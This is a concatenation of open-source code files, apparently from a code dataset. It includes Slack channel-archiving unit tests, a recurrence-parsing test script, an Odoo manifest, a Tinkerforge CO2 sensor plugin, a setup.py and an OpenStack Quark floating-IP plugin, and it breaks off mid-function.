mock_slacker.get_channel_info.return_value = {'age': 60 * 86400}
self.destalinator.get_messages = mock.MagicMock(return_value=[m for m in sample_slack_messages if 'attachments' in m])
self.assertFalse(self.destalinator.stale('stalinists', 30))
class DestalinatorArchiveTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_skips_ignored_channel(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
mock_slacker.archive.return_value = {'ok': True}
self.destalinator.config.config['ignore_channels'] = ['stalinists']
self.destalinator.archive("stalinists")
self.assertFalse(mock_slacker.post_message.called)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_skips_when_destalinator_not_activated(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=False)
mock_slacker.post_message.return_value = {}
self.destalinator.archive("stalinists")
self.assertFalse(mock_slacker.post_message.called)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_announces_closure_with_closure_text(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
mock_slacker.archive.return_value = {'ok': True}
mock_slacker.get_channel_member_names.return_value = ['sridhar', 'jane']
self.destalinator.archive("stalinists")
self.assertIn(
mock.call('stalinists', mock.ANY, message_type='channel_archive'),
mock_slacker.post_message.mock_calls
)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_announces_members_at_channel_closing(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
mock_slacker.archive.return_value = {'ok': True}
names = ['sridhar', 'jane']
mock_slacker.get_channel_member_names.return_value = names
self.destalinator.archive("stalinists")
self.assertIn(
mock.call('stalinists', MockValidator(lambda s: all(name in s for name in names)), message_type=mock.ANY),
mock_slacker.post_message.mock_calls
)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_calls_archive_method(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
mock_slacker.archive.return_value = {'ok': True}
self.destalinator.archive("stalinists")
mock_slacker.archive.assert_called_once_with('stalinists')
class DestalinatorSafeArchiveTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_skips_channel_with_only_restricted_users(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
mock_slacker.archive.return_value = {'ok': True}
mock_slacker.channel_has_only_restricted_members.return_value = True
self.destalinator.safe_archive("stalinists")
self.assertFalse(mock_slacker.archive.called)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_skips_archiving_if_before_earliest_archive_date(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
self.destalinator.archive = mock.MagicMock(return_value=True)
mock_slacker.channel_has_only_restricted_members.return_value = False
today = date.today()
self.destalinator.earliest_archive_date = today.replace(day=today.day + 1)
self.destalinator.safe_archive("stalinists")
self.assertFalse(self.destalinator.archive.called)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_calls_archive_method(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
self.destalinator.archive = mock.MagicMock(return_value=True)
mock_slacker.channel_has_only_restricted_members.return_value = False
self.destalinator.safe_archive("stalinists")
self.destalinator.archive.assert_called_once_with('stalinists')
class DestalinatorSafeArchiveAllTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_calls_stale_once_for_each_channel(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.channels_by_name = {'leninists': {'id': 'ABC4321'}, 'stalinists': {'id': 'ABC4321'}}
self.destalinator.stale = mock.MagicMock(return_value=False)
days = self.destalinator.config.archive_threshold
self.destalinator.safe_archive_all(days)
self.assertEqual(self.destalinator.stale.mock_calls, [mock.call('leninists', days), mock.call('stalinists', days)])
@mock.patch('tests.test_destalinator.SlackerMock')
def test_only_archives_stale_channels(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.channels_by_name = {'leninists': {'id': 'ABC4321'}, 'stalinists': {'id': 'ABC4321'}}
def fake_stale(channel, days):
return {'leninists': True, 'stalinists': False}[channel]
self.destalinator.stale = mock.MagicMock(side_effect=fake_stale)
days = self.destalinator.config.archive_threshold
self.destalinator.safe_archive = mock.MagicMock()
self.destalinator.safe_archive_all(days)
self.destalinator.safe_archive.assert_called_once_with('leninists')
@mock.patch('tests.test_destalinator.SlackerMock')
def test_does_not_archive_ignored_channels(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_channels'] = ['leninists']
mock_slacker.channels_by_name = {'leninists': {'id': 'ABC4321'}, 'stalinists': {'id': 'ABC4321'}}
def fake_stale(channel, days):
return {'leninists': True, 'stalinists': False}[channel]
self.destalinator.stale = mock.MagicMock(side_effect=fake_stale)
mock_slacker.channel_has_only_restricted_members.return_value = False
self.destalinator.earliest_archive_date = date.today()
self.destalinator.safe_archive_all(self.destalinator.config.archive_threshold)
self.assertFalse(mock_slacker.archive.called)
class DestalinatorWarnTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_warns_by_posting_message(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.channel_has_only_restricted_members.return_value = False
mock_slacker.get_messages_in_time_range.return_value = sample_slack_messages
self.destalinator.warn("stalinists", 30)
mock_slacker.post_message.assert_called_with("stalinists", self.destalinator.warning_text, message_type='channel_warning')
@mock.patch('tests.test_destalinator.SlackerMock')
def test_does_not_warn_when_previous_warning_found(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.channel_has_only_restricted_members.return_value = False
mock_slacker.get_messages_in_time_range.return_value = [
{
"text": self.destalinator.warning_text,
"user": "ABC123",
"attachments": [{"fallback": "channel_warning"}]
}
]
self.destalinator.warn("stalinists", 30)
self.assertFalse(mock_slacker.post_message.called)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_does_not_warn_when_previous_warning_with_changed_text_found(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.channel_has_only_restricted_members.return_value = False
mock_slacker.get_messages_in_time_range.return_value = [
{
"text": self.destalinator.warning_text + "Some new stuff",
"user": "ABC123",
"attachments": [{"fallback": "channel_warning"}]
}
]
self.destalinator.warn("stalinists", 30)
self.assertFalse(mock_slacker.post_message.called)
if __name__ == '__main__':
unittest.main()
| apache-2.0 | 9,137,686,970,157,095,000 | 48.113462 | 130 | 0.673519 | false | 3.462915 | true | false | false |
UpOut/UpOutDF | test.py | 1 | 2268 | from upoutdf.parse import get_class
#test = "every month on last sunday,monday starting _October_15_2012_8:00PM ending _April_1_2014 at 8:00PM lasting 120 minutes in America/Los_Angeles"
#test = "every month day 4 starting _October_1_2013 ending _April_1_2014 at 8:00PM lasting 2 hours in America/Los_Angeles"
#test = "every weeks on tuesday,monday at 9:00PM lasting 6 hours in America/Los_Angeles"
test = "once starting _05/23/2015_08:00_PM ending _05/23/2015_11:00_PM in US/Pacific"
z = get_class(test)
def localize(time,timezone):
return timezone.normalize(time.astimezone(timezone))
z.verify()
z.parse()
print z.canonicalize()
#print z.occurences().__hash__()
#print "FROM HERE"
#for block in z.occurences().get_blocks():
# print block.__hash__()
# for o in block.get_occurences():
# pass
#print o.__hash__()
# print "\n\n"
#start = localize(start,z.timezone)
#end = localize(end,z.timezone)
#print start
#print start.isoweekday()
#print end
#print end.isoweekday()
#print "\n\n---"
"""
from upoutdf.snapping import SnapLogical
from dateutil import parser
import pytz
tz = pytz.timezone('America/Los_Angeles')
date = parser.parse("February 5, 2014")
date = tz.localize(date)
date = pytz.utc.normalize(date.astimezone(pytz.utc))
snapper = SnapLogical(tz)
print snapper.snap_to_month_weekday(date,5,'last')
"""
"""
FORMATS:
RECURRING:
every (int) <year(s) (day <int>)| month(s) on <<1st,2nd,3rd,4th,5th,last> <m,t,w,tr,f,sa,s> | day <int>> | week(s) on <m,t,w,tr,f,sa,s> | day(s)> (starting <datetimestring>) (ending <datetimestring>) (repeating <int> times) at <timestamp> lasting <int> <hours,minutes,seconds> in <timezone>
SINGLE:
once starting <datetimestring> ending <datetimestring> in America/Los_Angeles
Both starting and ending are inclusive
every [int] [years/months/weeks/days] [day][on] [dow] [int] starting [date] ending [date] at [time] lasting[hours]
every month on 3rd thursday at 9:00PM lasting 6 hours in America/Los_Angeles
3rd thursday of every month
At 9:00pm until 3AM
every 1 year at TIMESTAMP lasting 4 hours in America/Los_Angeles
every week starting TIMESTAMP ending TIMESTAMP at TIMESTAMP until TIMESTAMP in America/New_York_City
""" | mit | 8,324,564,143,246,006,000 | 29.253333 | 298 | 0.701499 | false | 2.842105 | false | false | false |
maljac/odoo-addons | report_extended_purchase/__openerp__.py | 1 | 1599 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2015 ADHOC SA (http://www.adhoc.com.ar)
# All Rights Reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Report Configurator - Purchase',
'version': '1.0',
'category': 'Reporting Subsystem',
'sequence': 14,
'summary': '',
'description': """
Report Configurator - Purchase
==============================
""",
'author': 'ADHOC SA',
'website': 'www.adhoc.com.ar',
'images': [
],
'depends': [
'report_extended',
'purchase',
],
'data': [
'views/report_view.xml',
],
'demo': [
],
'test': [
],
'installable': True,
'auto_install': True,
'application': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 4,613,577,968,119,786,000 | 30.98 | 78 | 0.554096 | false | 4.037879 | false | false | false |
Tinkerforge/brickv | src/brickv/plugin_system/plugins/co2_v2/co2_v2.py | 1 | 3550 | # -*- coding: utf-8 -*-
"""
CO2 2.0 Plugin
Copyright (C) 2019 Olaf Lüke <[email protected]>
co2_v2.py: CO2 2.0 Plugin Implementation
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public
License along with this program; if not, write to the
Free Software Foundation, Inc., 59 Temple Place - Suite 330,
Boston, MA 02111-1307, USA.
"""
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QVBoxLayout, QHBoxLayout
from brickv.plugin_system.comcu_plugin_base import COMCUPluginBase
from brickv.bindings.bricklet_co2_v2 import BrickletCO2V2
from brickv.plot_widget import PlotWidget, CurveValueWrapper
from brickv.callback_emulator import CallbackEmulator
class CO2V2(COMCUPluginBase):
def __init__(self, *args):
super().__init__(BrickletCO2V2, *args)
self.co2 = self.device
self.cbe_all_values = CallbackEmulator(self,
self.co2.get_all_values,
None,
self.cb_all_values,
self.increase_error_count)
self.current_co2 = CurveValueWrapper() # int, ppm
self.current_temperature = CurveValueWrapper() # float, °C
self.current_humidity = CurveValueWrapper() # float, %RH
plots_co2 = [('CO2', Qt.red, self.current_co2, '{} PPM'.format)]
self.plot_widget_co2 = PlotWidget('CO2 [PPM]', plots_co2, y_resolution=1.0)
plots_temperature = [('Temperature', Qt.red, self.current_temperature, '{} °C'.format)]
self.plot_widget_temperature = PlotWidget('Temperature [°C]', plots_temperature, y_resolution=0.01)
plots_humidity = [('Relative Humidity', Qt.red, self.current_humidity, '{} %RH'.format)]
self.plot_widget_humidity = PlotWidget('Relative Humidity [%RH]', plots_humidity, y_resolution=0.01)
layout_plot1 = QHBoxLayout()
layout_plot1.addWidget(self.plot_widget_co2)
layout_plot2 = QHBoxLayout()
layout_plot2.addWidget(self.plot_widget_temperature)
layout_plot2.addWidget(self.plot_widget_humidity)
layout_main = QVBoxLayout(self)
layout_main.addLayout(layout_plot1)
layout_main.addLayout(layout_plot2)
def cb_all_values(self, values):
self.current_co2.value = values.co2_concentration
self.current_temperature.value = values.temperature / 100.0
self.current_humidity.value = values.humidity / 100.0
def start(self):
self.cbe_all_values.set_period(250)
self.plot_widget_co2.stop = False
self.plot_widget_temperature.stop = False
self.plot_widget_humidity.stop = False
def stop(self):
self.cbe_all_values.set_period(0)
self.plot_widget_co2.stop = True
self.plot_widget_temperature.stop = True
self.plot_widget_humidity.stop = True
def destroy(self):
pass
@staticmethod
def has_device_identifier(device_identifier):
return device_identifier == BrickletCO2V2.DEVICE_IDENTIFIER
| gpl-2.0 | 1,356,080,298,779,096,300 | 37.543478 | 108 | 0.666949 | false | 3.697602 | false | false | false |
dataloop/slactorbot | setup.py | 1 | 1466 | """
Slactorbot - A Python Slack Bot with hot patch!
"""
import os
import re
from setuptools import find_packages, setup
def fread(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
def get_version():
VERSIONFILE = "slactorbot/_version.py"
verstrline = fread(VERSIONFILE).strip()
vsre = r"^__version__ = ['\"]([^'\"]*)['\"]"
mo = re.search(vsre, verstrline, re.M)
if mo:
VERSION = mo.group(1)
else:
raise RuntimeError("Unable to find version string in %s." %
(VERSIONFILE, ))
return VERSION
dependencies = ['thespian', 'slackclient', 'pyyaml', 'requests']
setup(
name='slactorbot',
version=get_version(),
url='https://github.com/dataloop/slactorbot',
download_url="https://github.com/dataloop/slactorbot/tarball/v" + get_version(),
license="MIT",
author='Steven Acreman',
author_email='[email protected]',
description='A Python Slack Bot with hot patch!',
keywords="slack bot",
packages=find_packages(exclude=['tests']),
exclude_package_data={'': ['config.yaml']},
include_package_data=True,
zip_safe=False,
platforms='any',
install_requires=dependencies,
entry_points={
'console_scripts': [
"slactorbot = slactorbot.bot:start",
],
},
classifiers=[
"Intended Audience :: Developers",
"Intended Audience :: System Administrators"
])
| mit | -8,639,457,963,312,591,000 | 27.192308 | 84 | 0.61869 | false | 3.490476 | false | false | false |
rackerlabs/quark | quark/plugin_modules/floating_ips.py | 1 | 24567 | # Copyright 2013 Rackspace Hosting Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib import exceptions as n_exc
from oslo_config import cfg
from oslo_log import log as logging
from quark import billing
from quark.db import api as db_api
from quark.db import ip_types
from quark.drivers import floating_ip_registry as registry
from quark import exceptions as q_exc
from quark import ipam
from quark import plugin_views as v
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
quark_router_opts = [
cfg.StrOpt('floating_ip_segment_name', default='floating_ip',
help=_('Segment name for floating IP subnets')),
cfg.StrOpt('floating_ip_ipam_strategy', default='ANY',
help=_('Override the network IPAM stategy for floating '
"allocation. Use 'NETWORK' to fall back to the "
"network's strategy")),
]
CONF.register_opts(quark_router_opts, 'QUARK')
def _get_network(context, network_id):
network = db_api.network_find(context, id=network_id, scope=db_api.ONE)
if not network:
raise n_exc.NetworkNotFound(net_id=network_id)
return network
def _get_port(context, port_id):
port = db_api.port_find(context, id=port_id, scope=db_api.ONE)
if not port:
raise n_exc.PortNotFound(port_id=port_id)
if not port.ip_addresses or len(port.ip_addresses) == 0:
raise q_exc.NoAvailableFixedIpsForPort(port_id=port_id)
return port
def _get_fixed_ip(context, given_fixed_ip, port):
if not given_fixed_ip:
fixed_ip = _get_next_available_fixed_ip(port)
if not fixed_ip:
raise q_exc.NoAvailableFixedIpsForPort(
port_id=port.id)
else:
fixed_ip = next((ip for ip in port.ip_addresses
if (ip['address_readable'] == given_fixed_ip and
ip.get('address_type') == ip_types.FIXED)),
None)
if not fixed_ip:
raise q_exc.FixedIpDoesNotExistsForPort(
fixed_ip=given_fixed_ip, port_id=port.id)
if any(ip for ip in port.ip_addresses
if (ip.get('address_type') in (ip_types.FLOATING,
ip_types.SCALING) and
ip.fixed_ip['address_readable'] == given_fixed_ip)):
raise q_exc.PortAlreadyContainsFloatingIp(
port_id=port.id)
return fixed_ip
def _allocate_ip(context, network, port, requested_ip_address, address_type):
new_addresses = []
ip_addresses = []
if requested_ip_address:
ip_addresses.append(requested_ip_address)
seg_name = CONF.QUARK.floating_ip_segment_name
strategy_name = CONF.QUARK.floating_ip_ipam_strategy
if strategy_name.upper() == 'NETWORK':
strategy_name = network.get("ipam_strategy")
port_id = port
if port:
port_id = port.id
ipam_driver = ipam.IPAM_REGISTRY.get_strategy(strategy_name)
ipam_driver.allocate_ip_address(context, new_addresses, network.id,
port_id, CONF.QUARK.ipam_reuse_after,
seg_name, version=4,
ip_addresses=ip_addresses,
address_type=address_type)
return new_addresses[0]
def _get_next_available_fixed_ip(port):
floating_ips = [ip for ip in port.ip_addresses
if ip.get('address_type') in
(ip_types.FLOATING, ip_types.SCALING)]
fixed_ips = [ip for ip in port.ip_addresses
if ip.get('address_type') == ip_types.FIXED]
if not fixed_ips or len(fixed_ips) == 0:
return None
used = [ip.fixed_ip.address for ip in floating_ips
if ip and ip.fixed_ip]
return next((ip for ip in sorted(fixed_ips,
key=lambda ip: ip.get('allocated_at'))
if ip.address not in used), None)
def _get_ips_by_type(context, ip_type, filters=None, fields=None):
filters = filters or {}
filters['_deallocated'] = False
filters['address_type'] = ip_type
ips = db_api.floating_ip_find(context, scope=db_api.ALL, **filters)
return ips
def _create_flip(context, flip, port_fixed_ips):
"""Associates the flip with ports and creates it with the flip driver
:param context: neutron api request context.
:param flip: quark.db.models.IPAddress object representing a floating IP
:param port_fixed_ips: dictionary of the structure:
{"<id of port>": {"port": <quark.db.models.Port>,
"fixed_ip": "<fixed ip address>"}}
:return: None
"""
if port_fixed_ips:
context.session.begin()
try:
ports = [val['port'] for val in port_fixed_ips.values()]
flip = db_api.port_associate_ip(context, ports, flip,
port_fixed_ips.keys())
for port_id in port_fixed_ips:
fixed_ip = port_fixed_ips[port_id]['fixed_ip']
flip = db_api.floating_ip_associate_fixed_ip(context, flip,
fixed_ip)
flip_driver = registry.DRIVER_REGISTRY.get_driver()
flip_driver.register_floating_ip(flip, port_fixed_ips)
context.session.commit()
except Exception:
context.session.rollback()
raise
# alexm: Notify from this method for consistency with _delete_flip
billing.notify(context, 'ip.associate', flip)
def _get_flip_fixed_ip_by_port_id(flip, port_id):
for fixed_ip in flip.fixed_ips:
if fixed_ip.ports[0].id == port_id:
return fixed_ip
def _update_flip(context, flip_id, ip_type, requested_ports):
"""Update a flip based IPAddress
:param context: neutron api request context.
:param flip_id: id of the flip or scip
:param ip_type: ip_types.FLOATING | ip_types.SCALING
:param requested_ports: dictionary of the structure:
{"port_id": "<id of port>", "fixed_ip": "<fixed ip address>"}
:return: quark.models.IPAddress
"""
# This list will hold flips that require notifications.
# Using sets to avoid dups, if any.
notifications = {
'ip.associate': set(),
'ip.disassociate': set()
}
context.session.begin()
try:
flip = db_api.floating_ip_find(context, id=flip_id, scope=db_api.ONE)
if not flip:
if ip_type == ip_types.SCALING:
raise q_exc.ScalingIpNotFound(id=flip_id)
raise q_exc.FloatingIpNotFound(id=flip_id)
current_ports = flip.ports
# Determine what ports are being removed, being added, and remain
req_port_ids = [request_port.get('port_id')
for request_port in requested_ports]
curr_port_ids = [curr_port.id for curr_port in current_ports]
added_port_ids = [port_id for port_id in req_port_ids
if port_id and port_id not in curr_port_ids]
removed_port_ids = [port_id for port_id in curr_port_ids
if port_id not in req_port_ids]
remaining_port_ids = set(curr_port_ids) - set(removed_port_ids)
# Validations just for floating ip types
if (ip_type == ip_types.FLOATING and curr_port_ids and
curr_port_ids == req_port_ids):
d = dict(flip_id=flip_id, port_id=curr_port_ids[0])
raise q_exc.PortAlreadyAssociatedToFloatingIp(**d)
if (ip_type == ip_types.FLOATING and
not curr_port_ids and not req_port_ids):
raise q_exc.FloatingIpUpdateNoPortIdSupplied()
port_fixed_ips = {}
# Keep the ports and fixed ips that have not changed
for port_id in remaining_port_ids:
port = db_api.port_find(context, id=port_id, scope=db_api.ONE)
fixed_ip = _get_flip_fixed_ip_by_port_id(flip, port_id)
port_fixed_ips[port_id] = {'port': port, 'fixed_ip': fixed_ip}
# Disassociate the ports and fixed ips from the flip that were
# associated to the flip but are not anymore
for port_id in removed_port_ids:
port = db_api.port_find(context, id=port_id, scope=db_api.ONE)
flip = db_api.port_disassociate_ip(context, [port], flip)
notifications['ip.disassociate'].add(flip)
fixed_ip = _get_flip_fixed_ip_by_port_id(flip, port_id)
if fixed_ip:
flip = db_api.floating_ip_disassociate_fixed_ip(
context, flip, fixed_ip)
# Validate the new ports with the flip and associate the new ports
# and fixed ips with the flip
for port_id in added_port_ids:
port = db_api.port_find(context, id=port_id, scope=db_api.ONE)
if not port:
raise n_exc.PortNotFound(port_id=port_id)
if any(ip for ip in port.ip_addresses
if (ip.get('address_type') == ip_types.FLOATING)):
raise q_exc.PortAlreadyContainsFloatingIp(port_id=port_id)
if any(ip for ip in port.ip_addresses
if (ip.get('address_type') == ip_types.SCALING)):
raise q_exc.PortAlreadyContainsScalingIp(port_id=port_id)
fixed_ip = _get_next_available_fixed_ip(port)
LOG.info('new fixed ip: %s' % fixed_ip)
if not fixed_ip:
raise q_exc.NoAvailableFixedIpsForPort(port_id=port_id)
port_fixed_ips[port_id] = {'port': port, 'fixed_ip': fixed_ip}
flip = db_api.port_associate_ip(context, [port], flip, [port_id])
notifications['ip.associate'].add(flip)
flip = db_api.floating_ip_associate_fixed_ip(context, flip,
fixed_ip)
flip_driver = registry.DRIVER_REGISTRY.get_driver()
# If there are not any remaining ports and no new ones are being added,
# remove the floating ip from unicorn
if not remaining_port_ids and not added_port_ids:
flip_driver.remove_floating_ip(flip)
# If new ports are being added but there previously was not any ports,
# then register a new floating ip with the driver because it is
# assumed it does not exist
elif added_port_ids and not curr_port_ids:
flip_driver.register_floating_ip(flip, port_fixed_ips)
else:
flip_driver.update_floating_ip(flip, port_fixed_ips)
context.session.commit()
except Exception:
context.session.rollback()
raise
# Send notifications for possible associate/disassociate events
for notif_type, flip_set in notifications.iteritems():
for flip in flip_set:
billing.notify(context, notif_type, flip)
# NOTE(blogan): ORM does not seem to update the model to the real state
# of the database, so I'm doing an explicit refresh for now.
context.session.refresh(flip)
return flip
def _delete_flip(context, id, address_type):
filters = {'address_type': address_type, '_deallocated': False}
flip = db_api.floating_ip_find(context, id=id, scope=db_api.ONE, **filters)
if not flip:
raise q_exc.FloatingIpNotFound(id=id)
current_ports = flip.ports
if address_type == ip_types.FLOATING:
if current_ports:
current_ports = [flip.ports[0]]
elif address_type == ip_types.SCALING:
current_ports = flip.ports
context.session.begin()
try:
strategy_name = flip.network.get('ipam_strategy')
ipam_driver = ipam.IPAM_REGISTRY.get_strategy(strategy_name)
ipam_driver.deallocate_ip_address(context, flip)
if current_ports:
db_api.port_disassociate_ip(context, current_ports, flip)
if flip.fixed_ips:
db_api.floating_ip_disassociate_all_fixed_ips(context, flip)
context.session.commit()
except Exception:
context.session.rollback()
raise
try:
driver = registry.DRIVER_REGISTRY.get_driver()
driver.remove_floating_ip(flip)
except Exception as e:
LOG.error('There was an error when trying to delete the floating ip '
'on the unicorn API. The ip has been cleaned up, but '
'may need to be handled manually in the unicorn API. '
'Error: %s' % e.message)
# alexm: Notify from this method because we don't have the flip object
# in the callers
billing.notify(context, 'ip.disassociate', flip)
def create_floatingip(context, content):
"""Allocate or reallocate a floating IP.
:param context: neutron api request context.
:param content: dictionary describing the floating ip, with keys
as listed in the RESOURCE_ATTRIBUTE_MAP object in
neutron/api/v2/attributes.py. All keys will be populated.
:returns: Dictionary containing details for the new floating IP. If values
are declared in the fields parameter, then only those keys will be
present.
"""
LOG.info('create_floatingip %s for tenant %s and body %s' %
(id, context.tenant_id, content))
network_id = content.get('floating_network_id')
# TODO(blogan): Since the extension logic will reject any requests without
# floating_network_id, is this still needed?
if not network_id:
raise n_exc.BadRequest(resource='floating_ip',
msg='floating_network_id is required.')
fixed_ip_address = content.get('fixed_ip_address')
ip_address = content.get('floating_ip_address')
port_id = content.get('port_id')
port = None
port_fixed_ip = {}
network = _get_network(context, network_id)
if port_id:
port = _get_port(context, port_id)
fixed_ip = _get_fixed_ip(context, fixed_ip_address, port)
port_fixed_ip = {port.id: {'port': port, 'fixed_ip': fixed_ip}}
flip = _allocate_ip(context, network, port, ip_address, ip_types.FLOATING)
_create_flip(context, flip, port_fixed_ip)
return v._make_floating_ip_dict(flip, port_id)
def update_floatingip(context, id, content):
"""Update an existing floating IP.
:param context: neutron api request context.
:param id: id of the floating ip
:param content: dictionary with keys indicating fields to update.
valid keys are those that have a value of True for 'allow_put'
as listed in the RESOURCE_ATTRIBUTE_MAP object in
neutron/api/v2/attributes.py.
:returns: Dictionary containing details for the new floating IP. If values
are declared in the fields parameter, then only those keys will be
present.
"""
LOG.info('update_floatingip %s for tenant %s and body %s' %
(id, context.tenant_id, content))
if 'port_id' not in content:
raise n_exc.BadRequest(resource='floating_ip',
msg='port_id is required.')
requested_ports = []
if content.get('port_id'):
requested_ports = [{'port_id': content.get('port_id')}]
flip = _update_flip(context, id, ip_types.FLOATING, requested_ports)
return v._make_floating_ip_dict(flip)
def delete_floatingip(context, id):
"""deallocate a floating IP.
:param context: neutron api request context.
:param id: id of the floating ip
"""
LOG.info('delete_floatingip %s for tenant %s' % (id, context.tenant_id))
_delete_flip(context, id, ip_types.FLOATING)
def get_floatingip(context, id, fields=None):
"""Retrieve a floating IP.
:param context: neutron api request context.
:param id: The UUID of the floating IP.
:param fields: a list of strings that are valid keys in a
floating IP dictionary as listed in the RESOURCE_ATTRIBUTE_MAP
object in neutron/api/v2/attributes.py. Only these fields
will be returned.
:returns: Dictionary containing details for the floating IP. If values
are declared in the fields parameter, then only those keys will be
present.
"""
LOG.info('get_floatingip %s for tenant %s' % (id, context.tenant_id))
filters = {'address_type': ip_types.FLOATING, '_deallocated': False}
floating_ip = db_api.floating_ip_find(context, id=id, scope=db_api.ONE,
**filters)
if not floating_ip:
raise q_exc.FloatingIpNotFound(id=id)
return v._make_floating_ip_dict(floating_ip)
def get_floatingips(context, filters=None, fields=None, sorts=None, limit=None,
marker=None, page_reverse=False):
"""Retrieve a list of floating ips.
:param context: neutron api request context.
:param filters: a dictionary with keys that are valid keys for
a floating ip as listed in the RESOURCE_ATTRIBUTE_MAP object
in neutron/api/v2/attributes.py. Values in this dictionary
are an iterable containing values that will be used for an exact
match comparison for that value. Each result returned by this
function will have matched one of the values for each key in
filters.
:param fields: a list of strings that are valid keys in a
floating IP dictionary as listed in the RESOURCE_ATTRIBUTE_MAP
object in neutron/api/v2/attributes.py. Only these fields
will be returned.
:returns: List of floating IPs that are accessible to the tenant who
submits the request (as indicated by the tenant id of the context)
as well as any filters.
"""
LOG.info('get_floatingips for tenant %s filters %s fields %s' %
(context.tenant_id, filters, fields))
floating_ips = _get_ips_by_type(context, ip_types.FLOATING,
filters=filters, fields=fields)
return [v._make_floating_ip_dict(flip) for flip in floating_ips]
def get_floatingips_count(context, filters=None):
"""Return the number of floating IPs.
:param context: neutron api request context
:param filters: a dictionary with keys that are valid keys for
a floating IP as listed in the RESOURCE_ATTRIBUTE_MAP object
in neutron/api/v2/attributes.py. Values in this dictionary
are an iterable containing values that will be used for an exact
match comparison for that value. Each result returned by this
function will have matched one of the values for each key in
filters.
:returns: The number of floating IPs that are accessible to the tenant who
submits the request (as indicated by the tenant id of the context)
as well as any filters.
NOTE: this method is optional, as it was not part of the originally
defined plugin API.
"""
LOG.info('get_floatingips_count for tenant %s filters %s' %
(context.tenant_id, filters))
if filters is None:
filters = {}
filters['_deallocated'] = False
filters['address_type'] = ip_types.FLOATING
count = db_api.ip_address_count_all(context, filters)
LOG.info('Found %s floating ips for tenant %s' % (count,
context.tenant_id))
return count
def create_scalingip(context, content):
"""Allocate or reallocate a scaling IP.
:param context: neutron api request context.
:param content: dictionary describing the scaling ip, with keys
as listed in the RESOURCE_ATTRIBUTE_MAP object in
neutron/api/v2/attributes.py. All keys will be populated.
:returns: Dictionary containing details for the new scaling IP. If values
are declared in the fields parameter, then only those keys will be
present.
"""
LOG.info('create_scalingip for tenant %s and body %s',
context.tenant_id, content)
network_id = content.get('scaling_network_id')
ip_address = content.get('scaling_ip_address')
requested_ports = content.get('ports', [])
network = _get_network(context, network_id)
port_fixed_ips = {}
for req_port in requested_ports:
port = _get_port(context, req_port['port_id'])
